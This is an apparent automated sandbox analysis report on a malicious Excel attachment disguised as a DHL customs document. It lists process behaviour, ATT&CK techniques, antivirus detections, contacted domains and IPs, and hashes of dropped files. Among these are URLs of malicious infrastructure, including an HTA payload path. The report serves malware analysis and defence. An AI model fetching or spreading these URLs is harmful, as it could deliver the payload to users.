Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: DHL AWB CUSTOM CLEARANCE.xlsStream path 'Workbook' entropy: 7.99909358593 (max. 8.0)
Source: A0C30000.0.drStream path 'Workbook' entropy: 7.99593815204 (max. 8.0)
Source: C:\Windows\splwow64.exeWindow / User API: threadDelayed 877Jump to behavior
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: ~DFC6097FFC31D38087.TMP.0.drBinary or memory string: <V V="QEMU" T="W" />
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information queried: ProcessInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid Accounts13
Exploitation for Client Execution
1
Scripting
1
Process Injection
2
Masquerading
OS Credential Dumping1
Security Software Discovery
Remote Services1
Email Collection
1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
DLL Side-Loading
1
DLL Side-Loading
1
Disable or Modify Tools
LSASS Memory1
Process Discovery
Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
Extra Window Memory Injection
1
Virtualization/Sandbox Evasion
Security Account Manager1
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Process Injection
NTDS1
Application Window Discovery
Distributed Component Object ModelInput Capture13
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Obfuscated Files or Information
LSA Secrets1
File and Directory Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading
Cached Domain Credentials2
System Information Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
Extra Window Memory Injection
DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
DHL AWB CUSTOM CLEARANCE.xls34%ReversingLabsDocument-Excel.Exploit.TempInj
DHL AWB CUSTOM CLEARANCE.xls25%VirustotalBrowse
DHL AWB CUSTOM CLEARANCE.xls100%AviraEXP/TempInj.MN
DHL AWB CUSTOM CLEARANCE.xls100%Joe Sandbox ML
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://s.deemos.com/hANTnNH4?&astrology=wet0%Avira URL Cloudsafe
https://s.deemos.com/hANTnNH4?&astrology=wet%20&abolishment=scintillating&pavement0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
svc.ms-acdc-teams.office.com
52.123.243.91
truefalse
    high
    bg.microsoft.map.fastly.net
    199.232.214.172
    truefalse
      high
      s.deemos.com
      14.103.79.10
      truefalse
        high
        s-part-0017.t-0009.t-msedge.net
        13.107.246.45
        truefalse
          high
          NameMaliciousAntivirus DetectionReputation
          https://s.deemos.com/hANTnNH4?&astrology=wet%20&abolishment=scintillating&pavementfalse
          • Avira URL Cloud: safe
          unknown
          NameSourceMaliciousAntivirus DetectionReputation
          https://s.deemos.com/hANTnNH4?&astrology=wetDHL AWB CUSTOM CLEARANCE.xls, A0C30000.0.drfalse
          • Avira URL Cloud: safe
          unknown
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
          IPDomainCountryFlagASNASN NameMalicious
          14.103.79.10
          s.deemos.comChina
          18002WORLDPHONE-INASNumberforInterdomainRoutingINfalse
          131.226.2.34
          unknownUnited States
          16797UNASSIGNEDfalse
          Joe Sandbox version:42.0.0 Malachite
          Analysis ID:1591180
          Start date and time:2025-01-14 19:20:48 +01:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 5m 19s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:defaultwindowsofficecookbook.jbs
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
          Run name:Without Instrumentation
          Number of analysed new started processes analysed:14
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:DHL AWB CUSTOM CLEARANCE.xls
          Detection:MAL
          Classification:mal80.expl.winXLS@6/9@1/2
          EGA Information:Failed
          HCA Information:
          • Successful, ratio: 100%
          • Number of executed functions: 0
          • Number of non-executed functions: 0
          Cookbook Comments:
          • Found application associated with file extension: .xls
          • Changed system and user locale, location and keyboard layout to French - France
          • Found Word or Excel or PowerPoint or XPS Viewer
          • Attach to Office via COM
          • Active ActiveX Object
          • Active ActiveX Object
          • Active ActiveX Object
          • Scroll down
          • Close Viewer
          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe, MavInject32.exe
          • Excluded IPs from analysis (whitelisted): 52.109.89.18, 2.23.242.162, 52.109.76.243, 199.232.214.172, 52.182.141.63, 13.89.179.9, 52.123.243.91, 40.126.32.136, 172.202.163.200, 13.107.246.45
          • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.afd.azureedge.net, weu-azsc-config.officeapps.live.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, eur.roaming1.live.com.akadns.net, neu-azsc-000.roaming.officeapps.live.com, mobile.events.data.microsoft.com, roaming.officeapps.live.com, onedscolprdcus09.centralus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, officeclient.microsoft.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, otelrules.azureedge.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, fe3cr.delivery.mp.microsoft.com, config.officeapps.live.com, osiprod-neu-buff-azsc-000.northeurope.cloudapp.azure.com, azureedge-t-prod.trafficmanager.net, ecs.office.traffi
          • Not all processes where analyzed, report is missing behavior information
          • Report size exceeded maximum capacity and may have missing behavior information.
          • Report size getting too big, too many NtCreateKey calls found.
          • Report size getting too big, too many NtQueryAttributesFile calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          • Report size getting too big, too many NtReadFile calls found.
          • Report size getting too big, too many NtReadVirtualMemory calls found.
          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
          TimeTypeDescription
          13:22:47API Interceptor919x Sleep call for process: splwow64.exe modified
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          14.103.79.10P-04071A.xlsGet hashmaliciousUnknownBrowse
            P-04071A.xlsGet hashmaliciousUnknownBrowse
              P-04071A.xlsGet hashmaliciousUnknownBrowse
                Nuevo-orden.xla.xlsxGet hashmaliciousUnknownBrowse
                  Nuevo-orden.xla.xlsxGet hashmaliciousUnknownBrowse
                    Nuevo-orden.xla.xlsxGet hashmaliciousUnknownBrowse
                      PO#3311-20250108003.xlsGet hashmaliciousUnknownBrowse
                        PO#3311-20250108003.xlsGet hashmaliciousUnknownBrowse
                          131.226.2.34P-04071A.xlsGet hashmaliciousUnknownBrowse
                          • 131.226.2.34/xampp/meno/me/somenewgirlscameonmylifewithherattitudesonhere.hta
                          P-04071A.xlsGet hashmaliciousUnknownBrowse
                          • 131.226.2.34/xampp/meno/me/somenewgirlscameonmylifewithherattitudesonhere.hta
                          P-04071A.xlsGet hashmaliciousUnknownBrowse
                          • 131.226.2.34/xampp/meno/me/somenewgirlscameonmylifewithherattitudesonhere.hta
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          svc.ms-acdc-teams.office.com17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeGet hashmaliciousRemcosBrowse
                          • 52.123.243.81
                          https://mailustabucaedu-my.sharepoint.com/:u:/g/personal/stella_pabon_ustabuca_edu_co/EWCk8BqICKBBrExz32n-PvYBCVoLK4PToNCGKPT0vElGYg?e=w0tQWEGet hashmaliciousUnknownBrowse
                          • 52.123.243.11
                          Encrypt DOC2024.11.20.1983928 shared with you!.msgGet hashmaliciousUnknownBrowse
                          • 52.123.242.98
                          jokLq9gHyc.exeGet hashmaliciousINC RansomwareBrowse
                          • 52.123.255.71
                          file.exeGet hashmaliciousAmadey, Cryptbot, Stealc, VidarBrowse
                          • 52.123.242.140
                          c39-EmprisaMaldoc.rtfGet hashmaliciousUnknownBrowse
                          • 52.123.242.191
                          Viridium-gruppe shared ''v_iridium-gruppe_441826776_12.11.2024''.msgGet hashmaliciousUnknownBrowse
                          • 52.123.255.64
                          rPO3799039985.exeGet hashmaliciousRemcos, GuLoaderBrowse
                          • 52.123.251.14
                          file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                          • 52.123.242.159
                          SecuriteInfo.com.Trojan.GenericKD.74442994.24259.8937.exeGet hashmaliciousUnknownBrowse
                          • 52.123.243.92
                          s.deemos.comP-04071A.xlsGet hashmaliciousUnknownBrowse
                          • 14.103.79.10
                          P-04071A.xlsGet hashmaliciousUnknownBrowse
                          • 14.103.79.10
                          P-04071A.xlsGet hashmaliciousUnknownBrowse
                          • 14.103.79.10
                          Nuevo-orden.xla.xlsxGet hashmaliciousUnknownBrowse
                          • 14.103.79.10
                          Nuevo-orden.xla.xlsxGet hashmaliciousUnknownBrowse
                          • 14.103.79.10
                          Nuevo-orden.xla.xlsxGet hashmaliciousUnknownBrowse
                          • 14.103.79.10
                          PO#3311-20250108003.xlsGet hashmaliciousUnknownBrowse
                          • 14.103.79.10
                          PO#3311-20250108003.xlsGet hashmaliciousUnknownBrowse
                          • 14.103.79.10
                          bg.microsoft.map.fastly.net62.122.184.98 (2).ps1Get hashmaliciousUnknownBrowse
                          • 199.232.210.172
                          62.122.184.98 (2).ps1Get hashmaliciousUnknownBrowse
                          • 199.232.210.172
                          WZ6RvDzQeq.exeGet hashmaliciousUnknownBrowse
                          • 199.232.210.172
                          ea354192.pdfGet hashmaliciousUnknownBrowse
                          • 199.232.210.172
                          Ecastillo-In Service Agreement.pdfGet hashmaliciousHTMLPhisherBrowse
                          • 199.232.210.172
                          2.ps1Get hashmaliciousUnknownBrowse
                          • 199.232.210.172
                          Payment Receipt.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                          • 199.232.214.172
                          AimPrivStoreAtt117.exeGet hashmaliciousUnknownBrowse
                          • 199.232.210.172
                          email.emlGet hashmaliciousunknownBrowse
                          • 199.232.214.172
                          http://www.brillflooring.comGet hashmaliciousUnknownBrowse
                          • 199.232.214.172
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          WORLDPHONE-INASNumberforInterdomainRoutingINP-04071A.xlsGet hashmaliciousUnknownBrowse
                          • 14.103.79.10
                          P-04071A.xlsGet hashmaliciousUnknownBrowse
                          • 14.103.79.10
                          P-04071A.xlsGet hashmaliciousUnknownBrowse
                          • 14.103.79.10
                          5.elfGet hashmaliciousUnknownBrowse
                          • 14.103.40.242
                          Nuevo-orden.xla.xlsxGet hashmaliciousUnknownBrowse
                          • 14.103.79.10
                          Nuevo-orden.xla.xlsxGet hashmaliciousUnknownBrowse
                          • 14.103.79.10
                          Nuevo-orden.xla.xlsxGet hashmaliciousUnknownBrowse
                          • 14.103.79.10
                          PO#3311-20250108003.xlsGet hashmaliciousUnknownBrowse
                          • 14.103.79.10
                          UNASSIGNEDmeth10.elfGet hashmaliciousMiraiBrowse
                          • 41.220.60.247
                          meth4.elfGet hashmaliciousMiraiBrowse
                          • 41.220.60.241
                          meth14.elfGet hashmaliciousMiraiBrowse
                          • 157.225.246.181
                          mpsl.elfGet hashmaliciousUnknownBrowse
                          • 147.136.59.48
                          P-04071A.xlsGet hashmaliciousUnknownBrowse
                          • 131.226.2.34
                          P-04071A.xlsGet hashmaliciousUnknownBrowse
                          • 131.226.2.34
                          P-04071A.xlsGet hashmaliciousUnknownBrowse
                          • 131.226.2.34
                          3.elfGet hashmaliciousUnknownBrowse
                          • 144.74.225.103
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          6271f898ce5be7dd52b0fc260d0662b3https://forrestore.com/static/apps/437.zipGet hashmaliciousUnknownBrowse
                          • 14.103.79.10
                          q9JZUaS1Gy.docGet hashmaliciousUnknownBrowse
                          • 14.103.79.10
                          P-04071A.xlsGet hashmaliciousUnknownBrowse
                          • 14.103.79.10
                          P-04071A.xlsGet hashmaliciousUnknownBrowse
                          • 14.103.79.10
                          https://delicate-twilight-4fcb7a.netlify.app/Get hashmaliciousUnknownBrowse
                          • 14.103.79.10
                          http://latamavuelospromosco.com/Get hashmaliciousUnknownBrowse
                          • 14.103.79.10
                          https://pub-ce1f93897bdf44e9b1cd99ad0325c570.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                          • 14.103.79.10
                          statement.docGet hashmaliciousKnowBe4Browse
                          • 14.103.79.10
                          phish_alert_sp2_2.0.0.0 (1).emlGet hashmaliciousUnknownBrowse
                          • 14.103.79.10
                          No context
                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):118
                          Entropy (8bit):3.5700810731231707
                          Encrypted:false
                          SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
                          MD5:573220372DA4ED487441611079B623CD
                          SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
                          SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
                          SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
                          Malicious:false
                          Reputation:high, very likely benign file
                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.
                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                          File Type:data
                          Category:dropped
                          Size (bytes):970
                          Entropy (8bit):2.7144290103121165
                          Encrypted:false
                          SSDEEP:24:J3fIxk+vpCHhFGMfk6ScvBZGA8xpiOnAvJ5yoIHWJ4Ry:h3+RCHaMfkpcv/GAYcvJ5LIHM4w
                          MD5:33694DF65F2381221A32F7066C2BBF76
                          SHA1:053989F4C9DD243FBF192AE05A38A471B622E4A7
                          SHA-256:2E8FEF2D27B8CD0119223C72221E40AEE1DBD23985C02898733789AA823FB79B
                          SHA-512:7B336729095A56A8B3E865D67E8BA221823C3F0478DD08E5372D2E5C9B481963A638560EECB36777C40ED14FB01398AAA8860587588AF3BDAD9B939270A0274F
                          Malicious:false
                          Reputation:low
                          Preview:1.1.9.,.1.2.5.,.2.5.5.0.5.0.8.8.,.1.1.9.6.3.7.8.,.3.7.4.6.3.7.6.,.1.7.8.8.6.5.8.,.7.0.0.9.9.8.4.,.3.0.0.4.9.2.6.8.,.3.7.4.6.2.5.9.,.1.2.2.3.4.3.4.,.3.7.4.6.2.6.5.,.3.7.4.6.2.5.8.,.;.3.2.9.4.5.8.7.9.9.,.3.7.4.6.3.7.8.,.2.3.7.1.6.5.1.,.6.3.6.4.3.3.4.,.3.0.1.5.3.7.2.1.,.1.1.1.1.,.6.3.6.4.3.3.7.,.1.0.0.1.,.6.5.4.0.2.1.5.,.4.0.6.9.3.5.8.2.,.1.0.4.9.5.2.3.4.,.2.4.6.0.9.2.5.8.,.6.3.6.4.3.1.8.,.3.0.1.2.3.4.6.6.,.6.3.7.1.6.9.4.,.2.7.1.5.3.4.9.7.,.8.7.4.7.0.1.5.3.,.5.9.2.2.3.4.2.3.,.1.5.6.1.9.5.8.,.5.7.9.9.9.6.6.1.,.5.8.4.2.5.8.6.0.,.2.7.3.6.0.0.9.5.,.6.3.0.6.3.0.9.9.,.6.3.6.4.3.3.0.,.6.1.7.0.7.3.0.7.,.6.3.6.4.3.3.1.,.6.7.4.8.3.9.6.1.4.,.3.3.7.9.1.6.2.,.1.6.5.7.4.5.3.,.4.7.3.8.2.9.4.8.,.1.6.5.7.4.5.2.,.1.0.6.9.5.5.2.,.5.2.9.1.0.0.0.0.,.1.3.5.2.5.8.6.,.1.7.7.1.6.5.7.,.1.3.5.2.5.8.7.,.1.0.2.3.8.6.4.,.1.0.2.3.6.3.8.,.6.3.7.1.6.9.5.,.3.2.0.5.9.2.7.6.7.,.4.8.1.9.5.5.3.8.,.1.4.6.1.9.5.3.,.6.3.6.4.3.3.2.,.1.1.9.6.2.9.3.,.3.7.4.6.3.7.9.,.6.1.7.0.7.3.0.5.,.3.1.4.1.5.9.2.0.,.
                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                          File Type:data
                          Category:dropped
                          Size (bytes):512
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3::
                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
